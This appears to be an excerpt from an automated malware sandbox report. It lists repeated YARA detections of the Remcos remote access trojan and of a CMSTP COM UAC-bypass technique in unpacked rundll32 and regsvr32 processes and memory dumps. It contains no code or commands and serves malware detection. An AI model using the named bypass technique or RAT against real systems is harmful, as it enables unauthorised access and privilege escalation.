              Source: 14.2.rundll32.exe.2b40000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 5.2.rundll32.exe.4e10000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 5.2.rundll32.exe.4e10000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 5.2.rundll32.exe.4e10000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 3.2.regsvr32.exe.10ec85b6.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 3.2.regsvr32.exe.10ec85b6.3.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 3.2.regsvr32.exe.10ec85b6.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 25.2.rundll32.exe.2a90000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 25.2.rundll32.exe.2a90000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 25.2.rundll32.exe.2a90000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 5.2.rundll32.exe.4e10000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 5.2.rundll32.exe.4e10000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 5.2.rundll32.exe.4e10000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 22.2.rundll32.exe.4240000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 22.2.rundll32.exe.4240000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 22.2.rundll32.exe.4240000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 14.2.rundll32.exe.2b40000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 14.2.rundll32.exe.2b40000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 14.2.rundll32.exe.2b40000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 7.2.rundll32.exe.10ec85b6.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 7.2.rundll32.exe.10ec85b6.3.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 7.2.rundll32.exe.10ec85b6.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 17.2.rundll32.exe.8f0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 17.2.rundll32.exe.8f0000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 17.2.rundll32.exe.8f0000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 00000003.00000002.2232792548.0000000010EC8000.00000040.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 00000004.00000002.2230948357.0000000010EC8000.00000040.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 00000004.00000002.2183813294.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 00000004.00000002.2183813294.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 00000004.00000002.2183813294.0000000004DF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 00000005.00000002.2229503398.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 00000005.00000002.2229503398.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 00000005.00000002.2229503398.0000000004E10000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 0000000C.00000002.4190412425.0000000002B00000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 00000019.00000002.2592748708.0000000002A90000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 00000019.00000002.2592748708.0000000002A90000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 00000019.00000002.2592748708.0000000002A90000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 00000006.00000002.2212028354.0000000005330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 00000006.00000002.2212028354.0000000005330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 00000006.00000002.2212028354.0000000005330000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 00000006.00000002.2231320155.0000000010EC8000.00000040.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 00000012.00000002.2229090227.0000000000520000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 00000012.00000002.2229090227.0000000000520000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 00000012.00000002.2229090227.0000000000520000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 00000003.00000002.2209821177.0000000005990000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 00000003.00000002.2209821177.0000000005990000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 00000003.00000002.2209821177.0000000005990000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 00000016.00000002.2595336178.0000000010EC8000.00000040.00000001.01000000.00000005.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 00000016.00000002.2593046305.0000000004240000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 00000016.00000002.2593046305.0000000004240000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 00000016.00000002.2593046305.0000000004240000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 0000000E.00000002.2194973238.0000000002B40000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 0000000E.00000002.2194973238.0000000002B40000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 0000000E.00000002.2194973238.0000000002B40000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 00000007.00000002.2243597399.0000000010EC8000.00000040.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 00000000.00000002.2245664796.0000000010EC8000.00000040.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 00000011.00000002.2210556963.00000000008F0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 00000011.00000002.2210556963.00000000008F0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 00000011.00000002.2210556963.00000000008F0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 00000005.00000002.2242971963.0000000010EC8000.00000040.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 00000007.00000002.2230248176.0000000004830000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 00000007.00000002.2230248176.0000000004830000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 00000007.00000002.2230248176.0000000004830000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
